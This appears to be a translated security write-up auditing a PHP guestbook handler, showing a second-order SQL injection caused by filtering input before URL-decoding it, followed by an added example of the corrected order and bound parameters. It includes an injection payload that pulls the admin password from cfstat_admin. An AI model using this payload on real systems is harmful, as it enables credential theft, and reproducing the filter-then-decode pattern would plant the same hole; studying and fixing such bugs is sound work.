Today, when I was tired of reading, I downloaded this set of code.
Let's take a look at its description: it claims to be completely protected against injection attacks, with the password encrypted using 32-bit MD5.
After reading the code, most injections are basically impossible, unless the author has let something slip through.
However, there is one fairly common vulnerability.
Cf_do.php
Code:
// Leave a message
if ($action == "gbookaddsave")
{
$username = chkstr($_GET["username"], 1);
$content = htmlspecialchars(chkstr($_POST["content"], 1));
$contact = htmlspecialchars(chkstr($_POST["contact"], 1));
// chkstr() runs before urldecode() here, so the decoded value is never filtered
$ly = substr(urldecode(chkstr($_GET["ly"], 1)), 0, 255);
$currweb = substr(urldecode(chkstr($_GET["currweb"], 1)), 0, 255);
if ($content == "") alertclose("Enter the message content");
if ($contact == "") alertclose("Enter the contact information");
// Reject a message identical to one already left today
$sql = "select count(*) from cfstat_gbook where username='$username' and content='$content' and contact='$contact' and TO_DAYS(NOW())-TO_DAYS(addtime)=0";
$result = mysql_query($sql);
$rs = mysql_fetch_array($result);
if ($rs[0] > 0) alertclose("You have left the same message before!");
// $ly and $currweb are concatenated into the statement after being decoded
$sql = "insert into cfstat_gbook (username, content, contact, ly, currweb, addtime) values
('$username', '$content', '$contact', '$ly', '$currweb', '".date("Y-m-d H:i:s")."')";
mysql_query($sql);
alertclose("message succeeded");
}
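Anyone who has read about secondary injection vulnerabilities should find this familiar.
In the code above, the input is first filtered by chkstr and only then passed through urldecode, which is what creates the vulnerability. PHP has already URL-decoded the $_GET values once, so anything still encoded when chkstr inspects it is decoded only after the filter has run.
There is not much to say about finding the vulnerability itself. Exploitation is relatively easy.
For the insert into statement, the code can be written like this.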
Code:
insert into cfstat_gbook (username, content, contact, ly, currweb, addtime) values
(1111, 1111, 1111, SQL statement, (select pwd from cfstat_admin where id=1), 1111)%23$currweb,".date("Y-m-d H:i:s").")
In general, we should fix not only the common vulnerabilities but also the many unconventional ones.
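The chkstr-before-urldecode ordering in the code above, compared with the corrected order and with bound parameters, as an added example that is not code from the original post or from the application. `chkstr_assumed()` is a hypothetical stand-in for `chkstr()` (its body is not shown on the page and is assumed to escape quotes like `addslashes()`), the input value is constructed, and an in-memory SQLite database reached through PDO stands in for the MySQL table.

```php
<?php
// Hypothetical stand-in for the application's chkstr(): its body is not shown
// on the page, so it is assumed here to escape quotes the way addslashes() does.
function chkstr_assumed(string $s): string
{
    return addslashes($s);
}

// Order used in the guestbook code: filter first, decode afterwards.
function filter_then_decode(string $raw): string
{
    return substr(urldecode(chkstr_assumed($raw)), 0, 255);
}

// Corrected order: finish every decoding step, then filter the final value.
function decode_then_filter(string $raw): string
{
    return chkstr_assumed(substr(urldecode($raw), 0, 255));
}

// Constructed sample: the value $_GET["currweb"] holds once PHP has done its
// own URL decoding, for a client that sent the apostrophe double-encoded.
$currweb = "http://example.test/O%27Brien";

// The filter sees no quote character; urldecode() creates one after it ran.
var_dump(filter_then_decode($currweb));
// Decoding first lets the filter see, and escape, the apostrophe.
var_dump(decode_then_filter($currweb));

// Bound parameters keep the value out of the SQL text altogether, so the
// order of decoding no longer decides whether the statement can be altered.
// Assumption: in-memory SQLite stands in for MySQL; column types are guessed.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE cfstat_gbook (username TEXT, content TEXT,
    contact TEXT, ly TEXT, currweb TEXT, addtime TEXT)');
$stmt = $pdo->prepare('INSERT INTO cfstat_gbook
    (username, content, contact, ly, currweb, addtime)
    VALUES (?, ?, ?, ?, ?, ?)');
$stmt->execute(['guest', 'hello', 'guest@example.test', '',
    substr(urldecode($currweb), 0, 255), date('Y-m-d H:i:s')]);
var_dump($pdo->query('SELECT currweb FROM cfstat_gbook')->fetchColumn());
```

With bound parameters the stored value contains the apostrophe exactly as the visitor typed it, and no escaping filter is needed on the SQL path at all.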